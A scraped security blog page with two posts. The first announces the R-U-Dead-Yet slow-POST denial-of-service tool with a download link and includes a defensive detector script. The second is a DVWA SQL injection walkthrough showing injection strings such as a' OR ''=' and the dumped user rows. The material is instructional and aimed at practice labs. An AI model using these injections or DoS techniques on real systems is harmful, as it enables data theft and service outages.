Penetration Engineer<br />
<b>Universal HTTP DoS - Are You Dead Yet?</b> (2010-11-28)<br />
A generic flaw in the way HTTP works?<br />
Now that's the kinda stuff I always like to hear about.<br />
Oh, you mean to tell me that once again Web Application Firewalls cannot stop this attack?<br />
Allow me to put on my "surprised" face again. Of course a WAF cannot handle this. WAFs do not really detect traffic anomalies; they simply do what they were programmed to do - match pre-defined white/black list patterns.<br />
Some boffins talked about this attack at OWASP:<br />
<br />
<a href="http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf">http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf</a><br />
<br />
So trivial we all wonder why nobody's thought of this prior to late 2010...<br />
We simply find a nice web form to flood with never-ending POST values.<br />
Add in connection concurrency in the tens-to-hundreds scale per client, et voilà:<br />
Application layer Denial-of-Service attack.<br />
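As an added example (my own code, not from the post or the R.U.D.Y. tool), here is the check a defender can run against the pattern just described: it inspects per-connection records (constructed below) and flags any client holding many open POSTs that declared a large body but are delivering it a few bytes at a time; the thresholds are assumptions to be tuned to real traffic.<br />

```python
"""Added example (not from the post or the R-U-Dead-Yet tool): a server-side
detector for the slow-POST pattern described above.  All records below are
constructed; the thresholds are assumptions to be tuned per site."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Conn:
    client: str          # peer address
    method: str          # HTTP method of the open request
    content_length: int  # body size the client declared in Content-Length
    received: int        # body bytes the server has actually received so far
    open_seconds: float  # how long the request has been open


# Assumed thresholds.  A legitimate upload delivers kilobytes per second or more;
# a single user on a bad link is slow but does not hold dozens of connections.
MIN_CONCURRENT = 10   # open slow POSTs per client before we alert
MIN_AGE = 30.0        # seconds a POST may stay incomplete before we look at it
MAX_RATE = 10.0       # bytes per second; anything at or below this is a trickle


def is_slow_post(c: Conn) -> bool:
    """One connection matches when it is an old, unfinished POST whose body
    arrives at a few bytes per second, which is exactly what R.U.D.Y. produces."""
    if c.method != "POST" or c.open_seconds == 0:
        return False
    old_enough = c.open_seconds >= MIN_AGE
    unfinished = c.content_length > c.received
    trickling = MAX_RATE >= c.received / c.open_seconds
    return old_enough and unfinished and trickling


def flag_clients(conns) -> dict:
    """Return {client: count} for every client holding MIN_CONCURRENT or more
    slow POSTs at once; the concurrency is what turns a slow client into a DoS."""
    per_client = defaultdict(int)
    for c in conns:
        if is_slow_post(c):
            per_client[c.client] += 1
    return {ip: n for ip, n in per_client.items() if n >= MIN_CONCURRENT}


def sample_conns() -> list:
    """Constructed snapshot of a server's open requests."""
    conns = []
    # Attack pattern: 40 POSTs from one client, 100 MB declared, 12 bytes in 2 minutes.
    for _ in range(40):
        conns.append(Conn("203.0.113.7", "POST", 100_000_000, 12, 120.0))
    # Legitimate large upload: big body, delivered fast.
    conns.append(Conn("198.51.100.2", "POST", 50_000_000, 30_000_000, 20.0))
    # One user on a bad link: slow, but a single connection.
    conns.append(Conn("198.51.100.9", "POST", 2_000_000, 500, 90.0))
    # Many idle keep-alive GETs are not this attack.
    for _ in range(50):
        conns.append(Conn("198.51.100.3", "GET", 0, 0, 200.0))
    return conns


if __name__ == "__main__":
    print(flag_clients(sample_conns()))  # {'203.0.113.7': 40}
```

Apache's mod_reqtimeout enforces the same idea at the server itself through the MinRate setting of its RequestReadTimeout directive for the request body.<br />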
At the time of this writing, I could not find any efficient PoC code. So I wrote my own.<br />
Introducing: "R-U-Dead-Yet" or R.U.D.Y.<br />
Distributed or not, this baby knocks down websites and web-enabled devices.<br />
Apache? No problem for R.U.D.Y. IIS escaped the SlowLoris attack? It won't escape this time. Think you're ok cuz you wrote in ASP.NET / Java / PHP / whatever? Guess again. This attack is universal!<br />
All you need could be an antique machine running Linux (tested and verified with Ubuntu).<br />
With built-in detection of web forms and form fields suitable for attack, and unattended execution using pre-defined configuration files, this tool is simple enough for anyone to use.<br />
I know not of any firewall / IPS, including WAF, that will currently cope with this attack.<br />
And of course, as cyber warfare is our current hype, SCADA systems using web interfaces can also be attacked, according to the researchers behind the idea. Considering automatic discovery of Web-facing SCADA equipment using the <a href="http://www.shodanhq.com/">SHODAN</a> search engine, this could be major...<br />
So without much further ado, let the mayhem, anarchy and general fun begin!<br />
<br />
Download R-U-Dead-Yet at:<br />
<br />
<a href="http://code.google.com/p/r-u-dead-yet/">http://code.google.com/p/r-u-dead-yet/</a><br />
<br />
<b>Reference:</b><br />
http://chaptersinwebsecurity.blogspot.com/2010/11/universal-http-dos-are-you-dead-yet.html<br />
<br />
<b>SQL Injection Walkthrough (DVWA)</b> (2010-10-09)<br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: medium;"><span style="font-family: Impact, serif;">(<a href="http://www.hackyeah.com/wp-content/uploads/2010/05/HackYeah-SQL-Injection.pdf" style="color: #a2a2a2; text-decoration: underline;" title="SQL Injection Walkthrough - PDF">A PDF VERSION CAN BE DOWNLOADED HERE</a>)</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Intro"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Intro:</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">The goal of this paper is to help explain and demonstrate some of the dangers of SQL injection. It is in no way complete, and it is far from comprehensive. If you have any comments, suggestions, corrections, etc., please send them to Trenton@HackYeah.com</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">I have always believed that the best way to learn is to do. For this reason, I have tried to provide the reader a reference to use when practicing SQL injection. You are highly encouraged to follow along and try the following examples as you read.</span></span><br />
<span style="font-size: x-small;"><span style="font-family: Consolas, serif;">For the rest of this tutorial we will use Damn Vulnerable Web App (DVWA) as our practice grounds. The sources listed at the end of this paper contain both a link to the DVWA download and a link to the official install instructions. Do not install DVWA in a production environment. It could cause your host to be compromised (by the techniques listed below, among others).</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">I have used the XAMPP server package (Apache with MySQL) in a Windows environment for this walkthrough. This can be done with other web servers or operating systems, but some of the injections will need to be tailored accordingly.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Injection Intro"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Injection Intro:</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The following definition has been borrowed from Wikipedia: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed … SQL injection attacks are also known as SQL insertion attacks.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Rephrased, this means that we may be able to use specially crafted input to trick the SQL server into doing what we want it to do.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Formatting:</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The following injections can be split into three parts. For the sake of simplicity we will call these three parts the injection prefix, expression, and suffix. For the remainder of this paper I will refer to these three parts, when placed together, as the injection phrase. This will be </span><span style="color: red;"><span style="font-family: Consolas, serif;">red</span></span><span style="font-family: Consolas, serif;"> in color – it is what you will insert into the text box. The whole query (the original SQL query plus our injection phrase) will be referred to as the SQL injection query. I have shown the whole query, so that you can better understand what the SQL server is processing after we insert the injection phrase.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection prefix</em></span><span style="font-family: Consolas, serif;">” is the modification of the expected input that attempts to break us free of the expected value and place the rest of our input directly into the SQL query.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection expression</em></span><span style="font-family: Consolas, serif;">” contains the specific query used to gain information or execute code.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection suffix</em></span><span style="font-family: Consolas, serif;">” tidies up the remainder of the query so that it does not produce a syntax error. This is usually done by commenting out the rest of the query, but it can also be done by completing the query with valid SQL syntax.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="SQL Injection Walkthrough With DVWA"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>SQL INJECTION WALKTHROUGH WITH DVWA</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Once you have XAMPP running correctly, simply place the DVWA folder into your server’s root web directory (in a test environment only!). In this tutorial, DVWA will be located at c:\xampp\htdocs\dvwa.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Add the database login name and password to the DVWA configuration file located at …\dvwa\config\config.inc.php. With any web browser, go to <a href="http://127.0.0.1/dvwa" style="color: #a2a2a2; text-decoration: underline;">http://127.0.0.1/dvwa</a>. You will be prompted to “setup the database”. Click the noted link. If all goes well DVWA should note that setup was successful. Click on the “DVWA Security” tab. You will be prompted to insert a username and password. Log in with <strong>admin</strong> as the username and <strong>password</strong> as the password (they don’t call it DVWA for nothing). Set the security to low, and click submit. Click on the “SQL Injection” tab…we are now ready to go.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Although you can attack the server from the server itself (127.0.0.1 – localhost), if you want to use another computer to attack this vulnerable host, you will need to modify …\dvwa\.htaccess to include your network address. This helps prevent DVWA from being abused by outsiders.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Insert the text from the following examples noted in <span style="color: red;">red</span> into the User ID box, and then click Submit to see what happens.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Check expected results"></a><span style="font-family: Consolas, serif;"><strong>Check expected results:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 
0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>1</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Results:</li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ID:<span style="color: red;"><span style="font-family: Consolas, serif;">1</span></span> First name: admin<br />
Surname: admin</div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Note that we could cycle through each user to find out who, and how many there are. Something like this is an obvious information disclosure vulnerability.</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Check for hanling of quotes"></a><span style="font-family: Consolas, serif;"><strong>Check for handling of quotes:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>O'Malley</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We will use something that looks benign to check for quote handling errors.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> </span><span style="font-family: Consolas, serif;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near </span><span style="color: red;"><span style="font-family: Consolas, serif;">'Malley'</span></span><span style="font-family: Consolas, serif;">' at line 1</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We can see that everything after the single quote is being treated as part of the SQL statement.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Check the results of an OR True statement - First Try"></a><span style="font-family: Consolas, serif;"><strong>Check the results of an OR True statement – First Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR 1=1;--</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> </span><span style="font-family: Consolas, serif;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '</span><span style="color: red;"><span style="font-family: Consolas, serif;">--</span></span><span style="font-family: Consolas, serif;">'' at line 1</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The </span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">--</span></span></span><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"> didn’t work as hoped. Ideally (for the attacker) this would cause the entire remainder of the query to be treated as a comment; in MySQL, however, -- only starts a comment when it is followed by whitespace, so the trailing quote is not commented out. Note the extra single quote at the end of the returned error: the server is still expecting the single quote opened in user_id=' to be closed. Let’s try something else…</span></span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a name="Check the results of an OR True statement - Second Try"></a><span style="font-family: Consolas, serif;"><strong>Check the results of an OR True statement – Second Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = '</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a' OR ''='</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">'</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">Result:</span></span><span style="font-family: Consolas, serif;"> ID: a' OR ''='<br />
First name: admin<br />
Surname: admin</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Gordon<br />
Surname: Brown</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Hack<br />
Surname: Me</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Pablo<br />
Surname: Picasso</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a' OR ''='<br />
First name: bob<br />
Surname: smith</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">For a lookup like this, one would only expect the first row to be displayed. If you look at the DVWA source code (click the View Source tab in DVWA), you can see that a loop cycles through every returned row. This is a bad idea because the expected input should produce only one result; why they coded this page to display more than one is beyond me. I guess that's why they call it DVWA.</span></li>
